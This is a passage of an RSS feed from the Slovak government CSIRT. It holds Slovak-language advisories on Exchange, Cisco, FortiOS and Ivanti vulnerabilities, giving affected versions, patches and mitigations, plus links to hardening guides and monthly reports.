<p><strong>CVE-2024-21410 (CVSS skóre 9,8 )</strong></p>



<p><strong>Kritická zraniteľnosť</strong> CVE-2024-21410 sa nachádza na serveri Microsoft Exchange a <strong>umožňuje zvýšenie privilégií</strong>. Úspešné zneužitie chyby by mohlo <strong>vzdialenému neautentifikovanému útočníkovi</strong> umožniť získať overovaciu správu NTLM a odovzdať uniknutý hash Net-NTLMv2 používateľa pre overenie na serveri Exchange ako legitímny používateľ.</p>



<p><strong>CVE-2024-21412</strong> <strong>(CVSS skóre 8,1 )</strong></p>



<p>Vysoko závažná zraniteľnosť CVE-2024-21412 sa nachádza vo funkcii súborov internetových skratiek (LNK súbory) a umožňuje <strong>získať neoprávnený prístup k citlivým informáciám</strong> a prevziať kontrolu nad zariadením. <strong>Neautentifikovaný útočník</strong> má možnosť odoslať <strong>špeciálne vytvorený súbor pre obídenie bezpečnostnej kontroly. Pre úspešné zneužitie je nevyhnutná interakcia zo strany obete.</strong></p>



<p><strong>Spoločnosť Microsoft tiež vyzvala správcov systému Windows, aby venovali pozornosť chybe CVE-2024-21351 umožňujúcej obchádzanie bezpečnostných funkcií, ktorá je zneužívaná pri útokoch.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná inštalácia príslušného opravného balíka pre Vašu verziu Microsoft Outlook. <strong>Dôrazne odporúčame stiahnuť najnovšiu aktualizáciu zabezpečenia pre Exchange Server 2016, </strong>pomocou skriptu <a href="https://microsoft.github.io/CSS-Exchange/Security/ExchangeExtendedProtectionManagement/">ExchangeExtendedProtectionManagement.ps1</a> zapnete rozšírenú ochranu pre overovanie (EPA) pre servery Exchange.</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://thehackernews.com/2024/02/microsoft-rolls-out-patches-for-73.html">https://thehackernews.com/2024/02/microsoft-rolls-out-patches-for-73.html</a></p>



<p><a href="https://www.securityweek.com/microsoft-confirms-windows-exploits-bypassing-security-features/">https://www.securityweek.com/microsoft-confirms-windows-exploits-bypassing-security-features/</a></p>



<p><a href="https://thehackernews.com/2024/02/critical-exchange-server-flaw-cve-2024.html">https://thehackernews.com/2024/02/critical-exchange-server-flaw-cve-2024.html</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21410">https://nvd.nist.gov/vuln/detail/CVE-2024-21410</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21412">https://nvd.nist.gov/vuln/detail/CVE-2024-21412</a></p>



<p><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413">https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21413">https://nvd.nist.gov/vuln/detail/CVE-2024-21413</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/464/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Návod: Apache hardening manuál</title>
		<link>/posts/462</link>
					<comments>/posts/462#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 27 Feb 2024 07:35:55 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=462</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>CSIRT.SK vám prináša manuál, ktorý vás krok za krokom prevedie základnými nastaveniami pre zvýšenie zabezpečenia Vašej inštancie webového servera Apache....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>CSIRT.SK vám prináša manuál, ktorý vás krok za krokom prevedie základnými nastaveniami pre zvýšenie zabezpečenia Vašej inštancie webového servera Apache.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/02/Apache_hardening.pdf" data-type="link" data-id="/wp-content/uploads/2024/02/Apache_hardening.pdf">Apache hardening manuál (03-2024)</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/462/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosti v Cisco</title>
		<link>/posts/453</link>
					<comments>/posts/453#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 27 Feb 2024 07:24:06 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ACE]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=453</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco poukázala na bezpečnostné chyby vo viacerých svojich produktoch. Tieto chyby umožňujú vzdialenému útočníkovi vykonávanie ľubovoľných príkazov a&#160;zvýšenie privilégií...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco poukázala na bezpečnostné chyby vo viacerých svojich produktoch. Tieto chyby umožňujú vzdialenému útočníkovi vykonávanie ľubovoľných príkazov a&nbsp;zvýšenie privilégií na úroveň root.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cisco Unity Connection- 12.5 a&nbsp;staršie, 14</li>



<li>Cisco WAP371</li>



<li>Unified Communications Manager 11.5, 12.5, 14</li>



<li>Unified Communications Manager IM &amp; Presence Service 11.5, 12.5, 14</li>



<li>Unified Communications Manager Session Management Edition 11.5, 12.5, 14</li>



<li>Unified Contact Center Express 12.0 a&nbsp;staršie 12.5</li>



<li>Unity Connection 11.5, 12.5, 14</li>



<li>Virtualized Voice Browser 12.0 a&nbsp;staršie , 12.5, 12.5</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-20253</strong>&nbsp;<strong>(CVSS skóre 9,9)</strong></p>



<p><strong>Kritická zraniteľnosť</strong> CVE-2024-20253 sa nachádza v&nbsp;produktoch <strong>Unified Communications a Contact Center Solutions</strong>. Úspešné zneužitie&nbsp;umožňuje <strong>neoverenému vzdialenému útočníkovi vykonávať ľubovoľné príkazy</strong> s&nbsp;oprávneniami používateľa webových služieb. Chyba sa týka <strong>nesprávneho parsovania údajov</strong> od používateľa pri čítaní do pamäte. Útočníkovi <strong>dovoľuje vykonať kód odoslaním špeciálne vytvorenej správy na počúvajúci port zariadenia.</strong></p>



<p><strong>CVE-2024-20272 (CVSS skóre 7,3)</strong></p>



<p><strong>Vysoko závažná zraniteľnosť</strong> CVE-2024-20272 sa týka <strong>nedostatočnej autentifikácie v&nbsp;rozhraní API</strong> vo webovom rozhraní&nbsp;pre správu softvéru služby Unity Connection. Chyba umožňuje vzdialenému <strong>neautentifikovanému útočníkovi</strong> <strong>nahrať škodlivý súbor do zraniteľného systému.</strong> Úspešné zneužitie umožňuje tiež <strong>vykonať ľubovoľné príkazy</strong> a&nbsp;<strong>zvýšiť oprávnenia na úroveň root</strong>.</p>



<p><strong>CVE-2024-20287 (CVSS skóre 6,5)</strong></p>



<p>Zraniteľnosť CVE-2024-20287 sa nachádza v&nbsp;prístupovom bode Cisco WAP37 a umožňuje <strong>ľubovoľné vykonávanie príkazov s&nbsp;oprávneniami root</strong>. Pre úspešné zneužitie chyby <strong>sú potrebné administrátorské oprávnenia</strong>.</p>



<p>Spoločnosť Cisco uvádza, že aktualizácie firmvéru na opravu bezpečnostnej chyby CVE-2024-20287 <strong>nevydá</strong>, pretože zariadenie Cisco WAP371 dosiahlo <strong>koniec životnosti v júni 2019. </strong>Cisco nemá v úmysle vydať opravu pre chybu injektovania príkazov v zariadení WAP371 pričom uviedla, že toto zariadenie dosiahlo koniec životnosti (EoL) v júni 2019. Spoločnosť Cisco dodala aj aktualizácie na riešenie 11 stredne závažných zraniteľností, ktoré pokrývajú jej softvér vrátane Identity Services Engine, bezdrôtového prístupového bodu WAP371, ThousandEyes Enterprise Agent a TelePresence Management Suite (TMS).</p>



<p><strong>Závažnosť zraniteľnosti: </strong>Vysoká</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonávanie ľubovoľných príkazov</strong></li>



<li><strong>Zvyšovanie privilégií</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia verzie 12.5 a&nbsp;starších verzií na 12.5.1.19017-4, verzie 14 na verziu 14.0.1.14006-5.</strong></p>



<p><strong>Pre zmiernenie zraniteľnosti CVE-2024-20253 odporúčame nastaviť zoznamy riadenia prístupu (ACL), ktoré oddeľujú klastre produktov od používateľov a&nbsp;siete. Tieto zoznamy ACL by mali udeľovať prístup len k&nbsp;portom, kde sú nasadené služby.</strong></p>



<p>Spoločnosť Cisco odporúča migráciu zákazníkom, ktorí majú vo svojej sieti zariadenie WAP371, na prístupový bod Cisco Business 240AC.</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://thehackernews.com/2024/01/cisco-fixes-high-risk-vulnerability.html">https://thehackernews.com/2024/01/cisco-fixes-high-risk-vulnerability.html</a></p>



<p><a href="https://www.bleepingcomputer.com/news/security/cisco-says-critical-unity-connection-bug-lets-attackers-get-root/">https://www.bleepingcomputer.com/news/security/cisco-says-critical-unity-connection-bug-lets-attackers-get-root/</a></p>



<p><a href="https://thehackernews.com/2024/01/critical-cisco-flaw-lets-hackers.html">https://thehackernews.com/2024/01/critical-cisco-flaw-lets-hackers.html</a></p>



<p><a href="https://socradar.io/critical-rce-vulnerability-in-cisco-unified-communications-with-risk-of-root-access-cve-2024-20253/">https://socradar.io/critical-rce-vulnerability-in-cisco-unified-communications-with-risk-of-root-access-cve-2024-20253/</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-20272">https://nvd.nist.gov/vuln/detail/CVE-2024-20272</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-20287">https://nvd.nist.gov/vuln/detail/CVE-2024-20287</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-20253">https://nvd.nist.gov/vuln/detail/CVE-2024-20253</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/453/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Návod: Príručka zameraná na hardening operačného systému Microsoft Windows 11.</title>
		<link>/posts/451</link>
					<comments>/posts/451#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 20 Feb 2024 15:40:05 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Oznámenie]]></category>
		<category><![CDATA[Best practices]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">/?p=451</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>CSIRT.SK vám prináša manuál, ktorý vás krok za krokom prevedie nastaveniami pre zabezpečenie, resp. hardening operačného systému Windows 11. Príručka...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p>CSIRT.SK vám prináša manuál, ktorý vás krok za krokom prevedie nastaveniami pre zabezpečenie, resp. hardening operačného systému Windows 11.</p>



<p>Príručka zameraná na hardening operačného systému Microsoft Windows 11.<br><a href="https://csirt.sk/wp-content/uploads/2024/02/Win11_hardening.pdf" target="_blank" rel="noreferrer noopener">HardeningGuideWindows11 PDF (899 kB)</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/451/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností január 2024</title>
		<link>/posts/373</link>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 19 Feb 2024 15:24:01 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[2024]]></category>
		<category><![CDATA[monthly report]]></category>
		<guid isPermaLink="false">/?p=373</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci január 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci január 2024.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/02/Mesacnik_Januar.pdf" data-type="link" data-id="/wp-content/uploads/2024/02/Mesacnik_Januar.pdf" target="_blank" rel="noreferrer noopener">Mesačný prehľad – 01/2024 PDF (278 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softverovych-zranitelnosti" target="_blank" rel="noreferrer noopener">tomto odkaze</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – December 2023</title>
		<link>/posts/377</link>
					<comments>/posts/377#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 19 Feb 2024 15:22:11 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<guid isPermaLink="false">/?p=377</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci december 2023....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci december 2023. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií zozbieraných jednotkou CSIRT.SK pri svojej činnosti. Z kapacitných dôvodov však dočasne uverejňujeme skrátenú verziu správy, ktorá obsahuje prehľad z činnosti vládnej jednoty CSIRT a obsah mesačného prehľadu zraniteľností.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/02/MS2023-12short.pdf" data-type="link" data-id="/wp-content/uploads/2024/02/MS2023-12short.pdf" target="_blank" rel="noreferrer noopener">Mesačná správa – 12/2023 PDF (314&nbsp;KB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas" data-type="link" data-id="/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a><a href="https://www.csirt.gov.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas.html?csrt=6133375827264010668">.</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/377/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná kritická zraniteľnosť FortiOS SSL VPN</title>
		<link>/posts/338</link>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 09 Feb 2024 09:28:29 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ACE]]></category>
		<category><![CDATA[FortiOS]]></category>
		<guid isPermaLink="false">/?p=338</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/FORTIOS-1.jpeg" alt="" /></p>Spoločnosť Fortinet vydala varovanie pred dvoma kritickými zraniteľnosťami. Obe kritické RCE zraniteľnosti &#160;umožňujú neautentifikovanému útočníkovi ľubovoľné vykonávanie kódu alebo príkazovprostredníctvom...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/FORTIOS-1.jpeg" alt="" /></p>
<p><strong>Spoločnosť Fortinet vydala varovanie pred dvoma kritickými zraniteľnosťami. Obe kritické RCE zraniteľnosti &nbsp;umožňujú neautentifikovanému útočníkovi ľubovoľné vykonávanie kódu alebo príkazov</strong><strong>prostredníctvom špeciálne vytvorených HTTP požiadaviek. Zraniteľnosť CVE-2024-21762 je aktívne zneužívaná.</strong></p>



<p><strong>VJ CSIRT odporúča bezodkladne aktualizovať zraniteľné produkty Fortinet. Pokiaľ nie je možné vykonať aktualizáciu, nie je bezpečné využívať službu SSL VPN.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li><strong>FortiOS 7.4 (7.4.0 &#8211; 7.4.2)</strong></li>



<li><strong>FortiOS 7.2 (7.2.0 &#8211; 7.2.6)</strong></li>



<li><strong>FortiOS 7.0 (7.0.0 &#8211; 7.0.13)</strong></li>



<li><strong>FortiOS 6.4 (6.4.0 &#8211; 6.4.14)</strong></li>



<li><strong>FortiOS 6.2 (6.2.0 &#8211; 6.2.15)</strong></li>



<li><strong>FortiOS 6.0</strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>CVE-2024-21762 (CVSS skóre 9,6)</p>



<p><strong>Kritická zraniteľnosť</strong> CVE-2024-21762 sa nachádza v&nbsp;<strong>komponente sslvpnd </strong>&nbsp;a&nbsp;&nbsp;umožňuje <strong>zapisovať mimo povolené hodnoty vyrovnávacej pamäte</strong>. Úspešné zneužitie umožňuje <strong>neautentifikovanému útočníkovi ľubovoľné vykonávanie kódu alebo príkazov</strong> prostredníctvom <strong>špeciálne vytvorených HTTP požiadaviek</strong>. Útočník má možnosť zapisovať údaje pred začiatok alebo za koniec vyrovnávacej pamäte.</p>



<p><strong>Pre zraniteľnosť nie je vydaná dočasná mitigácia, zakázanie webového režimu VPN zraniteľnosť nerieši.</strong></p>



<p><strong>Zraniteľnosť CVE-2024-21762 môže byť aktívne zneužívaná.</strong></p>



<p>CVE-2024-23113 (CVSS skóre 9,8)</p>



<p><strong>Kritická zraniteľnosť</strong> CVE-2024-23113 sa nachádza v<strong> komponente fgfmd</strong> (fortigate/fortimanager communication daemon). Ide o&nbsp;bug formátovania reťazca z požiadavky. Úspešné zneužitie umožňuje <strong>neautentifikovanému útočníkovi vykonávanie ľubovoľného kódu alebo príkazov</strong> prostredníctvom <strong>špeciálne vytvorených HTTP požiadaviek</strong>.</p>



<p><strong>Podľa nedávnej správy od spoločnosti Fortinet sa na zraniteľnosti ich produktov zameriava Čínska, štátom sponzorovaná skupina Volt Typhoon.</strong></p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonávanie ľubovoľného kódu</strong></li>



<li><strong>Kompromitácia bezpečnostných sieťových prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Pokiaľ nemôžete aktualizovať, pre zmiernenie zraniteľnosti CVE-2024-21762 odporúčame vypnúť SSL VPN v zariadeniach Fortinet. (</strong><strong>Pre zraniteľnosť nie je vydaná dočasná mitigácia, zakázanie webového režimu VPN zraniteľnosť nerieši.)</strong></p>



<p><strong>Bezodkladná aktualizácia verzie:</strong></p>



<p><strong>Verzia&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Zraniteľné &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Opravená verzia</strong></p>



<p><strong>FortiOS 7.6 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; nie je zraniteľná &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &#8211;</strong></p>



<p><strong>FortiOS 7.4         7.4.0 &#8211; 7.4.2                       Upgrade na 7.4.3 alebo novšiu</strong></p>



<p><strong>FortiOS 7.2         7.2.0 &#8211; 7.2.6                       Upgrade na 7.2.7 alebo novšiu</strong></p>



<p><strong>FortiOS 7.0 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 7.0.0 &#8211; 7.0.13 &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Upgrade na 7.0.14 alebo novšiu</strong></p>



<p><strong>FortiOS 6.4 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 6.4.0 &#8211; 6.4.14 &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Upgrade na 6.4.15 alebo novšiu</strong></p>



<p><strong>FortiOS 6.2 &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 6.2.0 &#8211; 6.2.15 &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Upgrade na 6.2.16 alebo novšiu</strong></p>



<p><strong>FortiOS 6.0         všetky verzie                    Potrebný upgrade na vyššiu verziu</strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://www.fortiguard.com/psirt/FG-IR-24-015">https://www.fortiguard.com/psirt/FG-IR-24-015</a></li>



<li><a href="https://www.fortiguard.com/psirt/FG-IR-24-029">https://www.fortiguard.com/psirt/FG-IR-24-029</a></li>



<li><a href="https://thehackernews.com/2024/02/fortinet-warns-of-critical-fortios-ssl.html?m=1">https://thehackernews.com/2024/02/fortinet-warns-of-critical-fortios-ssl.html?m=1</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/new-fortinet-rce-flaw-in-ssl-vpn-likely-exploited-in-attacks/">https://www.bleepingcomputer.com/news/security/new-fortinet-rce-flaw-in-ssl-vpn-likely-exploited-in-attacks/</a></li>



<li><a href="https://vuldb.com/?id.253258">https://vuldb.com/?id.253258</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-23213">https://nvd.nist.gov/vuln/detail/CVE-2024-23213</a></li>



<li><a href="https://securityaffairs.com/158908/hacking/fortinet-fortios-rce-exploitation.html">https://securityaffairs.com/158908/hacking/fortinet-fortios-rce-exploitation.html</a></li>
</ul>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Ďalšia zero-day zraniteľnosť v produktoch Ivanti</title>
		<link>/posts/305</link>
					<comments>/posts/305#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 06 Feb 2024 13:39:34 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<guid isPermaLink="false">/?p=305</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre dve kritické zraniteľnosti v&#160;produktoch Connect Secure, Policy Secure a&#160;Neurons. Zero-day zraniteľnosť CVE-2024-21893 je aktívne...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie pre dve kritické zraniteľnosti v&nbsp;produktoch Connect Secure, Policy Secure a&nbsp;Neurons. Zero-day zraniteľnosť CVE-2024-21893 je aktívne zneužívaná</strong> <strong>čínskou špionážnou skupinou UTA0178/UNC5221 na inštaláciu webového shellu a zadných vrátok na zraniteľných zariadeniach</strong>.</p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ivanti Connect Secure 21.12, 21.9, 22.1, 22.2, 22.3, 22.4, 22.6, 9.0, 9.1</li>



<li>Ivanti Policy Secure 22.1, 22.2, 22.3, 22.4, 22.5, 22.6, 9.0, 9.1</li>



<li>Ivanti Neurons for ZTA</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-21888 (CVSS skóre 8,8)</strong></p>



<p><strong>Závažná zraniteľnosť</strong> CVE-2024-21888 sa nachádza vo webovej súčasti <strong>Connect Secure a Policy Secure</strong>. Úspešné zneužitie zraniteľnosti umožňuje útočníkovi <strong>zvýšiť oprávnenia na úroveň administrátora</strong>.</p>



<p><strong>CVE-2024-21893 (CVSS skóre 8,2)</strong></p>



<p><strong>Zero-day zraniteľnosť</strong> CVE-2024-21893 je chyba umožňujúca <strong>falšovanie požiadaviek na strane servera SSRF</strong> (Server Side Request Forgery) v&nbsp;<strong>komponente</strong> <strong>SAML </strong>(Security Assertion Markup Language). Úspešné zneužitie umožňuje útočníkovi <strong>neautentifikovaný prístup k obmedzeným zdrojom na zraniteľných zariadeniach</strong>.</p>



<p><strong>Zraniteľnosť CVE-2024-21893 je aktívne zneužívaná čínskou špionážnou skupinou UTA0178/UNC5221 na inštaláciu webového shellu a&nbsp;zadných <a href="https://www.csirt.gov.sk/posts/117.html">vrátok</a>.</strong></p>



<p><strong>Závažnosť zraniteľnosti: </strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia na verziu</strong>:<br><strong>Ivanti Connect Secure (verzie 9.1R14.4, 9.1R17.2, 9.1R18.3, 22.4R2.2, 22.5R1.1 a 22.5R2.2)<br>Ivanti Policy Secure verzia 22.5R1.1 a<br></strong><strong>Ivanti Neurons for</strong> <strong>ZTA verzia 22.6R1.3.</strong></p>



<p><strong>Pokiaľ nemôžete použiť aktualizáciu, zraniteľnosti&nbsp; je možné dočasne mitigovať importovaním súboru mitigation.release.20240107.1.xml prostredníctvom portálu na stiahnutie. Konkrétny postup nájdete </strong><a href="https://forums.ivanti.com/s/product-downloads?language=en_US"><strong>tu</strong></a><strong>.</strong><strong></strong></p>



<p><strong>Spoločnosť CISA odporúča federálnym agentúram odpojiť všetky zariadenia Ivanti Connect Secure a Policy Secure VPN. Do siete by sa mali opätovne pripojiť len zariadenia, ktoré boli obnovené do továrenského stavu a aktualizované na najnovšiu verziu firmvéru.</strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21888">https://nvd.nist.gov/vuln/detail/CVE-2024-21888</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/newest-ivanti-ssrf-zero-day-now-under-mass-exploitation/">https://www.bleepingcomputer.com/news/security/newest-ivanti-ssrf-zero-day-now-under-mass-exploitation/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21893">https://nvd.nist.gov/vuln/detail/CVE-2024-21893</a></li>



<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21893">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21893</a></li>



<li><a href="https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis">https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis</a></li>



<li><a href="https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US">https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure?language=en_US</a></li>



<li><a href="https://socradar.io/vulnerability-in-ivanti-connect-secure-policy-secure-and-neurons-for-zta-exploited-cve-2024-21888-cve-2024-21893/">https://socradar.io/vulnerability-in-ivanti-connect-secure-policy-secure-and-neurons-for-zta-exploited-cve-2024-21888-cve-2024-21893/</a><a href="https://www.cisa.gov/news-events/alerts/2024/01/30/updated-new-software-updates-and-mitigations-defend-against-exploitation-ivanti-connect-secure-and">https://www.cisa.gov/news-events/alerts/2024/01/30/updated-new-software-updates-and-mitigations-defend-against-exploitation-ivanti-connect-secure-and</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/305/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická a zero-day zraniteľnosť v produktoch VMware</title>
		<link>/posts/285</link>
					<comments>/posts/285#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
